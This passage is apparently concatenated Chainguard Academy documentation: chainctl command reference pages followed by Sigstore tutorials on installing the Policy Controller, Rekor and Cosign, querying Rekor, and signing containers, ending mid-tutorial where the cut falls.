terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl - Chainguard Control chainctl packages versions - Package version related commands for the Chainguard platform. --- ### chainctl packages versions URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_packages_versions/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl packages versions Package version related commands for the Chainguard platform. Options -h, --help help for versions Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl packages - Interact with Chainguard packages chainctl packages versions list - List package version data from Chainguard repositories. --- ### chainctl packages versions list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_packages_versions_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl packages versions list List package version data from Chainguard repositories. chainctl packages versions list PACKAGE_NAME [--show-eol] [--show-active] [--show-fips] [--output=csv|json|table|wide] Options -h, --help help for list --show-active Show only active versions. --show-eol Show only EOL versions. --show-fips Show only FIPS versions. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl packages versions - Package version related commands for the Chainguard platform. --- ### chainctl update URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_update/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl update Update chainctl. chainctl update [--yes] [--force] Options --force Skip the version check and update chainctl regardless of the current version. -h, --help help for update -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl - Chainguard Control --- ### chainctl version URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_version/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl version Prints the version chainctl version [flags] Options -h, --help help for version Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl - Chainguard Control --- ## Section: 2 ### How to Install Sigstore Policy Controller URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/how-to-install-policy-controller/ Last Modified: May 10, 2024 Tags: policy-controller, Procedural The Sigstore Policy Controller is a Kubernetes admission controller that can verify image signatures and policies. You can define policies using the CUE or Rego policy languages. This guide will demonstrate how to install the Policy Controller in your Kubernetes cluster and enable policy enforcement. Prerequisites To follow along with this guide, you will need the following: A Kubernetes cluster with administrative access. You can set up a local cluster using kind or use an existing cluster. kubectl — to work with your cluster. Install kubectl for your operating system by following the official Kubernetes kubectl documentation. The Helm command line tool to install the Policy Controller. Once you have everything in place you can continue to the next step and install the Policy Controller. Step 1 — Creating the cosign-system Kubernetes Namespace The first step that you need to complete is to create a Kubernetes namespace for the Policy Controller to run in. Call it cosign-system and run the following command to create it: kubectl create namespace cosign-system Now you can move on to the next step, which is installing the Policy Controller into the namespace you just created. Step 2 — Installing the Policy Controller In this step we’ll use the helm command line tool to install the Policy Controller. First, add the Sigstore Helm Repository to your system with the following command: helm repo add sigstore https://sigstore.github.io/helm-charts You should receive output like this: "sigstore" has been added to your repositories Next, update your local Helm repository information using the helm repo update command: helm repo update You’ll receive output like the following: Hang tight while we grab the latest from your chart repositories... ...Successfully got an update from the "sigstore" chart repository Update Complete. ⎈Happy Helming!⎈ Now install the Policy Controller into the cosign-system namespace that you created in the first step of this guide: helm install policy-controller -n cosign-system sigstore/policy-controller --devel The --devel flag will include any alpha, beta, or release candidate versions of a chart. You can specify a particular version with the --version flag if you prefer. It may take a few minutes for your cluster to deploy all of the manifests needed for the Policy Controller. Check the status of your cluster using the kubectl wait command like this: kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-webhook && \ kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-policy-webhook Once the Policy Controller deployments are done you will receive output like the following: deployment.apps/policy-controller-webhook condition met deployment.apps/policy-controller-policy-webhook condition met A full list of the resources that the Policy Controller deploys into your cluster is available at the end of this guide in Appendix — Resource Types. You have now deployed the Policy Controller into your cluster. The next step is to enable it for the namespaces that you want to enforce policies in. Step 3 — Enabling the Policy Controller Now that you have the Policy Controller installed into your cluster, the next step is to decide which namespaces should use it. By default, namespaces must enroll into enforcement, so you will need to label any namespace that you will use with the Policy Controller. Run the following command to include the default namespace in image validation and policy enforcement: kubectl label namespace default policy.sigstore.dev/include=true Apply the same label to any other namespace that you want to use with the Policy Controller. Now you can test enforcement by running a sample pod: kubectl run --image cgr.dev/chainguard/nginx:latest nginx The Policy Controller will deny the admission request with a message like the following: Error from server (BadRequest): admission webhook "policy.sigstore.dev" denied the request: validation failed: no matching policies: spec.containers[0].image cgr.dev/chainguard/nginx@sha256:628a01724b84d7db2dc3866f645708c25fab8cce30b98d3e5b76696291d65c4a The image is not admitted into the cluster because there are no ClusterImagePolicy (CIP) definitions that match it. In the next step you will define a policy that allows specific images and apply it to your cluster. Step 4 — Defining a ClusterImagePolicy Now that you have the Policy Controller running in your cluster, and have the default namespace configured to use it, you can now define a ClusterImagePolicy to admit images. The following policy will allow any Chainguard Image hosted on the cgr.dev/chainguard registry to run on a cluster, while denying any other images. Open a new file with nano or your preferred editor: nano /tmp/cip.yaml Copy the following policy to the /tmp/cip.yaml file: apiVersion:policy.sigstore.dev/v1beta1kind:ClusterImagePolicymetadata:name:chainguard-image-policyspec:images:- glob:"cgr.dev/chainguard/**"authorities:- static:action:passThe glob: "cgr.dev/chainguard/**" line in combination with the action: pass portion of the authorities section will allow any image in the cgr.dev/chainguard image registry to be admitted into your cluster. Save the file and then apply the policy: kubectl apply -f /tmp/cip.yaml You will receive output showing the policy is created: clusterimagepolicy.policy.sigstore.dev/chainguard-image-policy created Now run the cgr.dev/chainguard/nginx:latest image again: kubectl run --image cgr.dev/chainguard/nginx:latest nginx Since the image matches the policy, you will receive a message that the pod was created successfully: pod/nginx created Delete the pod once you’re done experimenting with it: kubectl delete pod nginx To learn more about how the Policy Controller admits images, review the Admission of images page Sigstore documentation. Appendix — Resource Types A complete Policy Controller installation consists of the following resources in a cluster: Type Name ClusterRole policy-controller-policy-webhook policy-controller-webhook ClusterRoleBinding policy-controller-policy-webhook policy-controller-webhook ConfigMap config-image-policies config-policy-controller policy-controller-policy-webhook-logging policy-controller-webhook-logging CustomResourceDefinition clusterimagepolicies.policy.sigstore.dev Deployment policy-controller-policy-webhook policy-controller-webhook MutatingWebhookConfiguration defaulting.clusterimagepolicy.sigstore.dev policy.sigstore.dev Role policy-controller-policy-webhook policy-controller-webhook RoleBinding policy-controller-policy-webhook policy-controller-webhook Secret policy-webhook-certs webhook-certs Service policy-webhook policy-controller-policy-webhook-metrics policy-controller-webhook-metrics webhook ServiceAccount policy-controller-policy-webhook policy-controller-webhook ValidatingWebhookConfiguration validating.clusterimagepolicy.sigstore.dev policy.sigstore.dev --- ### An Introduction to Rekor URL: https://edu.chainguard.dev/open-source/sigstore/rekor/an-introduction-to-rekor/ Last Modified: August 20, 2022 Tags: Rekor, Overview An earlier version of this material was published in the Rekor chapter of the Linux Foundation Sigstore course. Rekor stores records of artifact metadata, providing transparency for signatures and therefore helping the open source software community monitor and detect any tampering of the software supply chain. On a technical level, it is an append-only (sometimes called “immutable”) data log that stores signed metadata about a software artifact, allowing software consumers to verify that a software artifact is what it claims to be. You could think of Rekor as a bulletin board where anyone can post and the posts cannot be removed, but it’s up to the viewer to make informed judgements about what to believe. Transparency log Rekor’s role as a transparency log is the source of its security benefits for the software supply chain. Because the Rekor log is tamper-evident — meaning that any tampering can be detected — malicious parties will be less likely to tamper with the software artifacts protected by sigstore. In order to detect tampering, we can use monitors — software that examines the Rekor log and searches for anomalies — to verify that nothing has been manipulated outside of standard practices. Additionally, downstream users can search Rekor for signatures associated with signed artifact metadata, can verify the signature, and can make an informed judgment about what security guarantees to trust about a signed artifact. The Fulcio certificate authority enables a downstream user to trust that a public key associated with a particular artifact metadata entry from Rekor is associated with a particular identity, and Cosign performs this verification with a single convenient command. Public instance of Rekor A public instance of Rekor is run as a non-profit, public good transparency service that the open source software community can use. The service lives at https://rekor.sigstore.dev/. Those who are interested in helping to operate or maintain the Rekor public instance, or those who would like to discuss a production use case of the public instance can reach out via the mailing list. The latest Signed Tree hashes of Rekor are published on Google Cloud Storage. These are stored in both unverified raw and verified decoded formats; the signatures can be verified by users against Rekor’s public key. Entries include a short representation of the state of Rekor, which is posted to GCS, and can be verified by users against Rekor’s public key. These representations can be used to check that a given entry was in the log at a given time. Rekor usage Rekor provides a restful API based server for validation and a transparency log for storage, accessible via a command-line interface (CLI) application: rekor-cli. You can install rekor-cli with Go, which we will discuss in the lab section below. Alternatively, you can navigate to the Rekor release page to grab the most recent release, or you can build the Rekor CLI manually. Through the CLI, you can make and verify entries, query the transparency log to prove the inclusion of an artifact, verify the integrity of the transparency log, or retrieve entries by either public key or artifact. To access the data stored in Rekor, the rekor-cli requires either the log index of an entry or the universally unique identifier (UUID) of an artifact. The log index of an entry identifies the order in which the entry was entered into the log. Someone who wants to collect all the log entries or perhaps a large subset of the entries might use the log index, and receive an object as below, in their standard output. LogID: c0d23d6ad406973f9559f3ba2d1ca01f84147d8ffc5b8445c224f98b9591801d Index: 100 IntegratedTime: 2021-01-19T19:38:52Z UUID: 2343d145e62b1051b6a2a54582b69a821b13f31054539660a020963bac0b33dc Body: { "RekordObj": { "data": { "hash": { "algorithm": "sha256", "value": "bf9f7899c65cc4decf96658762c84015878e5e2e41171bdb39e6ac39b4d6b797" } }, "signature": { "content": "LS0tL…S0=", "format": "pgp", "publicKey": { "content": "LS…0tLS0=" } } } } The RekordObj is indicated inside the body field, and is one of the standard formats used by Rekor to indicate a digital signature of an object. The signature in this entry was generated via PGP, a traditional method of creating digital signatures, sometimes also used to sign code artifacts. Many other digital signature types are accepted. The signature block contains content fields that are base64-encoded, a form of encoding that enables reliably sending binary data over networks. There are a number of different formats stored in the Rekor log, each associated with a particular type of artifact and use case. Users of Rekor also have an offline method for determining whether a particular entry exists in a Rekor log by leveraging inclusion proofs, which are enabled through Merkle trees. Merkle trees are a data structure that enable a party to use cryptographic hash functions — a way of mapping potentially large values to relatively short digests — to prove that a piece of data is contained within a much larger data structure. This proof is accomplished by providing a series of hashes to the user, hashes that if recombined prove to the user that an entry is indeed in the Rekor log. Sigstore users can “staple” such an inclusion proof to an artifact, attaching the inclusion proof next to an artifact in a repository, and therefore proving that the artifact is indeed included in Rekor. For a detailed description of Merkle trees and inclusion proofs, refer to the “helpful resources” section at the end of this chapter. Setting up an internal Rekor instance Your organization can also set up its own instance of Rekor, or you can individually set up a Rekor server to more fully understand it. You can deploy the Rekor server through Project Sigstore’s Docker Compose file, through a Kubernetes operator, with a Helm chart, or you can build a Rekor server yourself. In order to build a Rekor server, you will need Go, a MySQL-compatible database, and you will need to build Trillian, an append-only log. In the lab section, we will walk through how to set up a Rekor server locally. --- ### An Introduction to Cosign URL: https://edu.chainguard.dev/open-source/sigstore/cosign/an-introduction-to-cosign/ Last Modified: July 29, 2024 Tags: Cosign, Overview An earlier version of this material was published in the Cosign chapter of the Linux Foundation Sigstore course. Cosign supports software artifact signing, verification, and storage in an OCI (Open Container Initiative) registry. While Cosign was developed with containers and container-related artifacts in mind, it can also be used for open source software packages and other file types. Cosign can therefore be used to sign blobs (binary large objects), files like READMEs, SBOMs (software bills of materials), Kubernetes Helm Charts, Tekton bundles (an OCI artifact containing Tekton CI/CD resources like tasks), and more. By signing software, you can authenticate that you are who you say you are, which can in turn enable a trust root so that developers and consumers who leverage your software can verify that you created the software artifact that you have said you’ve created. They can also ensure that the artifact was not tampered with by a third party. As someone who may use software libraries, containers, or other artifacts as part of your development lifecycle, a signed artifact can give you greater assurance that the code or container you are incorporating is from a trusted source. Code Signing with Cosign Software artifacts are distributed widely, can be incorporated into the software of other individuals and organizations, and are often updated throughout their life spans. End users and developers who build upon existing software are increasingly aware of the possibility of threats and vulnerabilities in packages, containers, and other artifacts. How can users and developers decide whether to use software created by others? One answer that has been increasingly gaining traction is code signing. While code signing is not new technology, the growing prevalence of software in our everyday lives coupled with a rising number of attacks like SolarWinds and Codecov has created a more pressing need for solutions that build trust, prevent forgery and tampering, and ultimately lead to a more secure software supply chain. Similar in concept to a signature on a document that was signed in the presence of a notary or other professional who can certify your identity, a signature on a software artifact attests that you are who you say you are and that the code was not altered after signing. Instead of a recognized notary when you sign software, it is a recognized certificate authority (CA) that validates your identity. These checks that go through recognized bodies able to establish a developer’s identity support the root of trust that security relies on so that bad actors cannot compromise software. Code signing involves a developer, software publisher, or entity (like an automated workload) digitally signing a software artifact to confirm their identity and ensure that the artifact was not tampered with since having been signed. Code signing has several implementations, and Cosign is one such implementation, but all code signing technology follows a similar process as Cosign. The recommended practice for a developer (or organization) looking to sign their code with Cosign is to use keyless signing. This process will first generate an ephemeral key pair which will then be used to create a digital signature for a given software artifact. A key pair is a combination of a signing key to sign data, and a verification key that is used to verify data signed with the corresponding signing key. With the cosign sign command, the developer will sign their software artifact, and that signature will be stored in the registry (if applicable). This signature can later be verified by others through searching for an artifact, finding its signature, and then verifying it. Keyless Signing Code signing is a solution for many use cases related to attestation and verification with the goal of a more secure software supply chain. While key pairs are a technology standard that have a long history in technology (SSH keys, for instance), they create their own challenges for developers and engineering teams. The contents of a public key are very opaque; humans cannot readily discern who the owner of a given key is. Traditional public key infrastructure, or PKI, has done the work to create, manage, and distribute public-key encryption and digital certificates. A new form of PKI is keyless signing, which prevents the challenges of long-lived and opaque signing keys. In keyless signing, short-lived certificates are generated and linked into the chain of trust through completing an identity challenge that confirms the identity of the signer. Because these keys persist only long enough for signing to take place, signature verification ensures that the certificate was valid at the time of signing. Policy enforcement is supported through an encoding of the identity information onto the certificate, allowing others to verify the identity of the developer who signed. Through offering short-lived credentials, keyless signing can support the recommended practice of operating your build environment like a production environment. This prevents the opportunity for long-lived keys to be stolen and used to sign malicious artifacts. Even if these short-lived keys used in keyless signing were stolen, they’d be useless! While keyless signing can be used by individuals in the same manner as long-lived key pairs, it is also well suited for continuous integration and continuous deployment workloads. Keyless signing works by sending an OpenID Connect (OIDC) token to a certificate authority like Fulcio to be signed by a workload’s authenticated OIDC identity. This allows the developer to cryptographically demonstrate that the software artifact was built by the continuous integration pipeline of a given repository, for example. Cosign uses ephemeral keys and certificates, gets them signed automatically by the Fulcio root certificate authority, and stores these signatures in the Rekor transparency log, which automatically provides an attestation at the time of creation. You can manually create a keyless signature with the following cosign command. In our example, we’ll use Docker Hub to store the signature. If you would like to follow along, ensure you are logged into Docker Hub on your local machine and that you have a Docker repository with an image available. The following example assumes a username of docker-username and a repository name of demo-container. cosign sign docker-username/demo-container You’ll be taken through a workflow that requests you to grant permission to have your information stored permanently in transparency logs, and moves to a workflow with an OIDC provider. Generating ephemeral keys... Retrieving signed certificate... Note that there may be personally identifiable information associated with this signed artifact. This may include the email address associated with the account with which you authenticate. This information will be used for signing this artifact and will be stored in public transparency logs and cannot be removed later. By typing 'y', you attest that you grant (or have permission to grant) and agree to have this information stored permanently in transparency logs. Are you sure you would like to continue? [y/N] Your browser will now be opened to: ... At this point, a browser window will open and you will be directed to a page that asks you to log in to Sigstore. You can authenticate with GitHub, Google, or Microsoft. Note that the email address that is tied to these credentials will be permanently visible in the Rekor transparency log. This makes it publicly visible that you are the one who signed the given artifact, and helps others trust the given artifact. That said, it is worth keeping this in mind when choosing your authentication method. Once you log in and are authenticated, you’ll receive feedback of “Sigstore Authentication Successful!”, and you may now safely close the window. On the terminal, you’ll receive output that you were successfully verified, and you’ll get confirmation that the signature was pushed. Successfully verified SCT... tlog entry created with index: Pushing signature to: index.docker.io/docker-username/demo-container If you followed along with Docker Hub, you can check the user interface of your repository and verify that you pushed a signature. You can then further verify that the keyless signature was successful by using cosign verify to check. You will need to know some information in order to verify the entry. You’ll need to use the identity flags --certificate-identity which corresponds to the email address of the signer, and --certificate-oidc-issuer which corresponds to the OIDC provider that the signer used. For example, a Gmail account using Google as the OIDC issuer, will be able to be verified with the following command. cosign verify \ --certificate-identity username@gmail.com \ --certificate-oidc-issuer https://accounts.google.com \ docker-username/demo-container Verification for index.docker.io/docker-username/demo-container:latest -- The following checks were performed on each of these signatures: - The cosign claims were validated - Existence of the claims in the transparency log was verified offline - The code-signing certificate was verified using trusted certificate authority certificates [{"critical":{"identity":{"docker-reference":"index.docker.io/docker-username/demo-container"},"image":{"docker-manifest-digest":"sha256:e..."},"type":"cosign container image signature"},"optional":{"1.3.6.1.4.1.57264.1.1":"https://accounts.google.com","Bundle":{"SignedEntryTimestamp":"...","Payload":{"body":"eyJhcGlWZX...X19","integratedTime":...,"logIndex":...,"logID":"..."}},"Issuer":"https://accounts.google.com","Subject":"username@gmail.com"}}] As part of the JSON output, you should get feedback on the issuer that you used and the email address associated with it. For example, if you used Google as your OIDC provider, you will have "Issuer":"https://accounts.google.com","Subject":"username@gmail.com"}}] as the last part of your output. Cosign with Keys You can also use Cosign with long-lived key pairs. If you would like to follow along, please first install Cosign. cosign generate-key-pair Enter password for private key: Enter again: Private key written to cosign.key Public key written to cosign.pub You can sign a container and store the signature in the registry with the cosign sign command. cosign sign --key cosign.key docker-username/demo-container Enter password for private key: Pushing signature to: index.docker.io/sigstore-course/demo:sha256-87ef60f558bad79beea6425a3b28989f01dd417164150ab3baab98dcbf04def8.sig Finally, you can verify a software artifact against a public key with the cosign verify command. This command will return 0 if at least one Cosign formatted signature for the given artifact is found that matches the public key. Any valid formats are printed to standard output in a JSON format. cosign verify --key cosign.pub docker-username/demo-container The following checks were performed on these signatures: - The cosign claims were validated - The signatures were verified against the specified public key {"Critical":{"Identity":{"docker-reference":""},"Image":{"Docker-manifest-digest":"sha256:87ef60f558bad79beea6425a3b28989f01dd417164150ab3baab98dcbf04def8"},"Type":"cosign container image signature"},"Optional":null} You should now have some familiarity with the process of signing and verifying code in Cosign. For a more thorough tutorial, please review How to Sign a Container with Cosign. Code signing provides developers and others who release code a way to attest to their identity, and in turn, those who are consumers (whether end users or developers who incorporate existing code) can verify those signatures to ensure that the code is originating from where it is said to have originated, and check that that particular developer (or vendor) is trusted. --- ### How to Install the Rekor CLI URL: https://edu.chainguard.dev/open-source/sigstore/rekor/how-to-install-rekor/ Last Modified: August 20, 2022 Tags: Rekor, Procedural An earlier version of this material was published in the Rekor chapter of the Linux Foundation Sigstore course. Follow this tutorial for an overview of how to install rekor-cli. To install the Rekor command line interface (rekor-cli) with Go, you will need Go version 1.16 or greater. For Go installation instructions, see the official Go documentation. If you have Go installed already, you can check your Go version via this command. go version If Go is installed, you’ll receive output similar to the following. go version go1.13.8 linux/amd64 You will also need to set your $GOPATH, the location of your Go workspace. export GOPATH=$(go env GOPATH) You can then install rekor-cli: go install -v github.com/sigstore/rekor/cmd/rekor-cli@latest Check that the installation of rekor-cli was successful using the following command: rekor-cli version You should receive output similar to that of below: GitVersion: v0.4.0-59-g2025bf8 GitCommit: 2025bf8aa50b368fc3972bb276dfeae8b604d435 GitTreeState: clean BuildDate: '2022-01-26T00:20:33Z' GoVersion: go1.17.6 Compiler: gc Platform: darwin/arm64 Now that you have the Rekor CLI tool successfully installed, you can start working with it. --- ### How to Install Cosign URL: https://edu.chainguard.dev/open-source/sigstore/cosign/how-to-install-cosign/ Last Modified: December 16, 2024 Tags: Cosign, Procedural An earlier version of this material was published in the Cosign chapter of the Linux Foundation Sigstore course. Cosign supports software artifact signing, verification, and storage in an OCI (Open Container Initiative) registry. By signing software, you can authenticate that you are who you say you are, which can in turn enable a trust root so that developers and consumers who leverage your software can verify that you created the software artifact that you have said you’ve created. They can also ensure that that artifact was not tampered with by a third party. As someone who may use software libraries, containers, or other artifacts as part of your development lifecycle, a signed artifact can give you greater assurance that the code or container you are incorporating is from a trusted source. There are a few different ways to install Cosign to your local machine or remote server. The approach you choose should be based on the way you set up packages, the tooling that you use, or the way that your organization recommends. We will go through several options. Please refer to the official Cosign installation documentation for additional context and updates. Installing Cosign with Homebrew or Linuxbrew Those who are running macOS locally may be familiar with Homebrew as a package manager. There is also a Linuxbrew version for those running a Linux distribution. If you are using macOS and would like to leverage a package manager, you can review the official documentation to install Homebrew to your machine. To install Cosign with Homebrew, run the following command. brew install cosign To update Cosign in the future, you can run brew upgrade cosign to get the newest version. Installing Cosign with Linux Package Managers Cosign is supported by the Arch Linux, Alpine Linux, and Nix package managers. On the releases page, you’ll also find .deb and .rpm packages for manual download and installation. To install Cosign on Arch Linux, use the pacman package manager. pacman -S cosign If you are using Alpine Linux or an Alpine Linux image, you can add Cosign with apk. apk add cosign For NixOS, you can install Cosign with the following command: nix-env -iA nixpkgs.cosign And for NixOS Linux, you can install Cosign using nixos.cosign with the nix-env package manager. nix-env -iA nixos.cosign For Ubuntu and Debian distributions, check the releases page and download the latest .deb package. At the time of this writing, this would be version 2.5.0. To install the .deb file, run: sudo dpkg -i ~/Downloads/cosign_2.5.0_amd64.deb For CentOS and Fedora, download the latest .rpm package from the releases page and install Cosign with: rpm -ivh cosign-2.5.0-1.x86_64.rpm You can check to ensure that Cosign is successfully installed using the cosign version command following installation. When you run the command, you should receive output that indicates the version you have installed. Installing Cosign with Go You can install Cosign using the Go package manager. Installing with Go will work across different operating systems and distributions. First, check that you have Go installed on your machine, and ensure that it is Go version 1.22.7 or later. go version go version go1.23.4 linux/amd64 If you run into an error or don’t receive output like the above, you’ll need to install Go in order to install Cosign with Go. Navigate to the official Go website in order to download the appropriate version of Go for your machine. With Go installed, you are ready to install Cosign using the following command. go install github.com/sigstore/cosign/v2/cmd/cosign@latest The resulting binary from this installation will be placed at $GOPATH/bin/cosign. Installing a Cosign release with Go You can install Cosign with Go directly from the Cosign GitHub releases page. At the time of writing, the newest release is v2.5.0. You can download this version with the following command. go install github.com/sigstore/cosign/v2/cmd/cosign@v2.5.0 The resulting binary from this installation will be placed at $GOPATH/bin/cosign. Check the [release page](Cosign GitHub releases page for additional releases. Installing Cosign with the Cosign Binary Installing Cosign via its binary offers you greater control over your installation, but this method also requires you to manage your installation yourself. In order to install via binary, check for the most updated version in the open source GitHub repository for Cosign under the releases page. You can use the wget command to install the most recent binary. In our example, the release we are installing is 2.5.0. wget "https://github.com/sigstore/cosign/releases/download/v2.5.0/cosign-linux-amd64" Next, move the Cosign binary to your bin folder. sudo mv cosign-linux-amd64 /usr/local/bin/cosign Finally, update permissions so that Cosign can execute within your filesystem. sudo chmod +x /usr/local/bin/cosign You’ll need to ensure that you keep Cosign up to date if you install via binary. You can always later opt to use a package manager to update Cosign in the future. --- ### How to Query Rekor URL: https://edu.chainguard.dev/open-source/sigstore/rekor/how-to-query-rekor/ Last Modified: August 20, 2022 Tags: Rekor, Procedural An earlier version of this material was published in the Rekor chapter of the Linux Foundation Sigstore course. Rekor is the transparency log of Sigstore, which stores records of artifact metadata. Before querying Rekor, you should have the rekor-cli installed, which you can achieve by following the “How to Install the Rekor CLI” tutorial. In order to access the data stored in Rekor, the rekor-cli requires either the log index of an entry or the UUID of a software artifact. For instance, to retrieve entry number 100 from the public log, use this command: rekor-cli get --rekor_server https://rekor.sigstore.dev --log-index 100 An abridged version of the output is below: LogID: c0d23d6ad406973f9559f3ba2d1ca01f84147d8ffc5b8445c224f98b9591801d Index: 100 IntegratedTime: 2021-01-19T19:38:52Z UUID: 2343d145e62b1051b6a2a54582b69a821b13f31054539660a020963bac0b33dc Body: { "RekordObj": { "data": { "hash": { "algorithm": "sha256", "value": "bf9f7899c65cc4decf96658762c84015878e5e2e41171bdb39e6ac39b4d6b797" } }, "signature": { "content": "LS0tL…S0=", "format": "pgp", "publicKey": { "content": "LS…0tLS0=" } } } } The next command will produce the same output but uses the UUID to retrieve the artifact: rekor-cli get --uuid 2343d145e62b1051b6a2a54582b69a821b13f31054539660a020963bac0b33dc It is also possible to use a web API to return results that are similar to those above. For instance, we can use curl to fetch the same artifact by its UUID with the following query: curl -X GET "https://rekor.sigstore.dev/api/v1/log/entries/2343d145e62b1051b6a2a54582b69a821b13f31054539660a020963bac0b33dc" By appending the UUID value returned by the rekor-cli get command that we ran before, we can obtain detailed information about a specific artifact that has been previously registered within the Rekor public instance. --- ### How to Sign a Container with Cosign URL: https://edu.chainguard.dev/open-source/sigstore/cosign/how-to-sign-a-container-with-cosign/ Last Modified: July 29, 2024 Tags: Cosign, Procedural An earlier version of this material was published in the Cosign chapter of the Linux Foundation Sigstore course. Cosign is a tool you can use to sign software artifacts, which in turn allows you to verify that you are who you say you are, and instills trust across the software ecosystem. Signing software also allows people to understand the provenance of the software, and prevents tampering. Let’s step through signing a container with Cosign. We are using a container to provide a sense of how you may use Sigstore with containerized workloads, but the steps we are taking to sign a container are very similar to the steps that we would take to sign any other software artifact that can be published in a container registry, and we will discuss signing blobs a little later. Prerequisites Before beginning this section, ensure that you have Docker installed and that you are running Docker Desktop if that is relevant for your operating system. For guidance on installing and using Docker, refer to the official Docker documentation. In order to push to the Docker container registry, you will need a Docker Hub account. If you are familiar with using a different container registry, feel free to use that. Additionally, you will need Cosign installed, which you can achieve by following our How to Install Cosign guide. Creating a Container You’ll now be creating a new container. Create a new directory within your user directory that is the same as your Docker username and, within that, a directory called hello-container. If you will be opting to use a registry other than Docker, feel free to use the relevant username for that registry. mkdir -p ~/docker-username/hello-container Move into the directory. cd ~/docker-username/hello-container Let’s create the Dockerfile that describes the container. This will be essentially a “Hello, World” container for demonstration purposes. Use the text editor of your choice to create the Dockerfile. You can use Visual Studio Code or a command line text editor like nano. Just ensure that the file is called exactly Dockerfile with a titlecase and no extension. nano Dockerfile Type the following into your editor: FROMalpineCMD ["echo", "Hello, Cosign!"]This file is instructing the container to use the Alpine Linux distribution, which is lightweight and secure. Then, it prints a “Hello, Cosign!” message onto the command-line interface. Once you are satisfied that your Dockerfile is the same as the text above, you can save and close the file. Now you are ready to build the container. Building and Running a Container Within the same hello-container directory, you can build the container. You should use the format docker-username/image-name to tag your image, since you’ll be publishing it to a registry. docker build -t docker-username/hello-container . If you receive an error message or a “failed” message, check that your user is part of the docker group and that you have the right permissions to run Docker. For testing, you may also try to run the above command with sudo. You should get guidance in the output that your build was successful when you receive no errors. => => naming to docker.io/docker-username/hello-container At this point your container is built and you can verify that the container is working as expected by running the container. docker run docker-username/hello-container You should receive the expected output of the echo message you added to the Dockerfile. Hello, Cosign! You can further confirm that the Docker container is among your listed containers by listing all of your active containers. docker ps -a CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES c828db494203 hello-container "echo 'Hello, Cosign…" 13 seconds ago Exited (0) 9 seconds ago confident_lamarr Your output will be similar to the above, but the timestamps and name will be different. Now that you have built your container and are satisfied that it is working as expected, you can publish and sign your container. Publishing a Container to a Registry We will be publishing our container to the Docker registry. If you are opting to use a different registry, your steps will be similar. At this point, you can access the Docker container registry at hub.docker.com and create a new repository under your username called hello-container. We will be making this public, but you can make it private if you prefer. If you are happy for it to be public, you can skip this step as the repository will be created when pushing the container. In any case, you can delete this once you are satisfied that you have signed the container. Once this is set up, you can push the container you created to the Docker Hub repository. docker push docker-username/hello-container You should be able to now access your published container via your Docker Hub account. Once you ensure that this is there, you are ready to push a signature to the container. Signing a Container and Pushing the Signature to a Registry Now that the container is in a registry (in our example, it is in Docker Hub), you are ready to sign the container and push that signature to the registry. You will call your registry user name and container name with the following cosign command. Note that we are signing the image in Docker Hub keylessly with Cosign. cosign sign docker-username/hello-container You will be asked to verify that you agree with having your information in the transparency log and will be taken through an OIDC workflow. Generating ephemeral keys... Retrieving signed certificate... Note that there may be personally identifiable information associated with this signed artifact. This may include the email address associated with the account with which you authenticate. This information will be used for signing this artifact and will be stored in public transparency logs and cannot be removed later. By typing 'y', you attest that you grant (or have permission to grant) and agree to have this information stored permanently in transparency logs. Are you sure you would like to continue? [y/N] Your browser will now be opened to: ... You’ll receive output indicating that the signature was pushed to the container registry. Successfully verified SCT... tlog entry created with index: Pushing signature to: index.docker.io/docker-username/hello-container In the case of 